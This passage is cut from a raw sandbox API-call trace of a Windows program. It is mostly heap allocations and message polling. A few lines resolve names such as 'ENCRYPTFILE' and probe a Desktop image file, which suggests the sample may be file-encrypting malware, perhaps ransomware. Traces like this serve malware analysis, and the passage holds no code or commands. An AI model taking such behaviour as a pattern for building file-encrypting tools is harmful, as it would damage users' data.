wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0134.709] PeekMessageW (in: lpMsg=0x144f534, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f534) returned 0 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0134.709] CharUpperBuffW (in: lpsz="ENCRYPTFILE", cchLength=0xb | out: lpsz="ENCRYPTFILE") returned 0xb [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf4a0 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf838 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2710 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4a0 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5b0 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2680 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca748 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x50) returned 0x436a3a0 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6d0 | out: hHeap=0x1780000) returned 1 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2640 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5c8 [0134.709] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xd0) returned 0x19d20a8 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x436a3a0 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca5c8 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.709] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca5c8 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf388 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26d0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca5e0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6b8 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f48 [0134.710] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25d0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797088 [0134.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797088 | out: hHeap=0x1780000) returned 1 [0134.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0134.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.710] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0134.710] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0134.710] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.710] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\uI6dJwkjdmY9\\PhzRCCH.jpg", lpFindFileData=0x144ee20 | out: lpFindFileData=0x144ee20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9c618140, ftCreationTime.dwHighDateTime=0x1d5ee39, ftLastAccessTime.dwLowDateTime=0x494d4a60, ftLastAccessTime.dwHighDateTime=0x1d5e589, ftLastWriteTime.dwLowDateTime=0x494d4a60, ftLastWriteTime.dwHighDateTime=0x1d5e589, nFileSizeHigh=0x0, nFileSizeLow=0x132ca, dwReserved0=0x101b1fc, dwReserved1=0x8, cFileName="PhzRCCH.jpg", cAlternateFileName="")) returned 0x41ac280 [0134.710] FindClose (in: hFindFile=0x41ac280 | out: hFindFile=0x41ac280) returned 1 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf360 | out: hHeap=0x1780000) returned 1 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25a0 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ee8 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2680 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392180 [0134.711] CharUpperBuffW (in: lpsz="_WINAPI_FILEINUSE", cchLength=0x11 | out: lpsz="_WINAPI_FILEINUSE") returned 0x11 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392180 | out: hHeap=0x1780000) returned 1 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2680 | out: hHeap=0x1780000) returned 1 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf360 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e25d0 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf4c8 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6d0 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca760 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfab8 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2600 [0134.711] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca700 | out: hHeap=0x1780000) returned 1 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf950 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca508 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca700 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0134.711] PeekMessageW (in: lpMsg=0x144eebc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144eebc) returned 0 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd10 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca718 [0134.711] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca730 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25e0 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4c0 | out: hHeap=0x1780000) returned 1 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0134.712] CharUpperBuffW (in: lpsz="_WINAPI_CREATEFILEEX", cchLength=0x14 | out: lpsz="_WINAPI_CREATEFILEEX") returned 0x14 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392378 | out: hHeap=0x1780000) returned 1 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa68 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2610 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2620 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2620 | out: hHeap=0x1780000) returned 1 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2680 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2720 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2620 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2650 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2650 | out: hHeap=0x1780000) returned 1 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43ca4d8 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.712] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0134.712] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca7a8 | out: hHeap=0x1780000) returned 1 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa48 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca7a8 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb08 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2650 [0134.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9d0 | out: hHeap=0x1780000) returned 1 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf978 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca880 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9d0 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca910 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2540 [0134.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd38 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca940 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca820 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2780 [0134.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2780 | out: hHeap=0x1780000) returned 1 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfbf8 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2860 [0134.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca9e8 | out: hHeap=0x1780000) returned 1 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392378 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca9e8 [0134.713] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28c0 [0134.713] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28c0 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf8d8 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2870 [0134.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab20 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9a0 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabb0 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb80 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2780 [0134.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cac10 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf9c8 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad60 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8c78 [0134.714] PeekMessageW (in: lpMsg=0x144e9a4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e9a4) returned 0 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc48 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab20 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2880 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caac0 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27e0 [0134.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cab98 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad30 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2760 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab50 [0134.714] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2760 | out: hHeap=0x1780000) returned 1 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac28 [0134.714] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab98 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac40 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2810 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab68 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2810 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabc8 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabf8 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac58 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2770 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab80 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2770 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac88 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e28b0 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad00 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caaf0 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2820 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2820 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caa90 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2920 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad78 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2920 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a92a8 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc70 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caca0 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27b0 [0134.715] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27b0 | out: hHeap=0x1780000) returned 1 [0134.715] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cace8 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cab38 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cabe0 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cac10 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cacd0 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad18 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cad48 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e27f0 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cadd8 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e27f0 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf88 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2750 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2750 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf58 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2890 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caeb0 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2890 | out: hHeap=0x1780000) returned 1 [0134.716] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x80) returned 0x41a5250 [0134.716] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a92a8 | out: hHeap=0x1780000) returned 1 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caf70 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2800 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2800 | out: hHeap=0x1780000) returned 1 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e27b0 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafa0 [0134.717] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caec8 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2840 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e28b0 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43caee0 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caec8 | out: hHeap=0x1780000) returned 1 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2840 | out: hHeap=0x1780000) returned 1 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43caee0 | out: hHeap=0x1780000) returned 1 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e28b0 | out: hHeap=0x1780000) returned 1 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfc70 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2890 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cafd0 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2790 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2770 [0134.717] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cada8 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cafd0 | out: hHeap=0x1780000) returned 1 [0134.717] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2790 | out: hHeap=0x1780000) returned 1 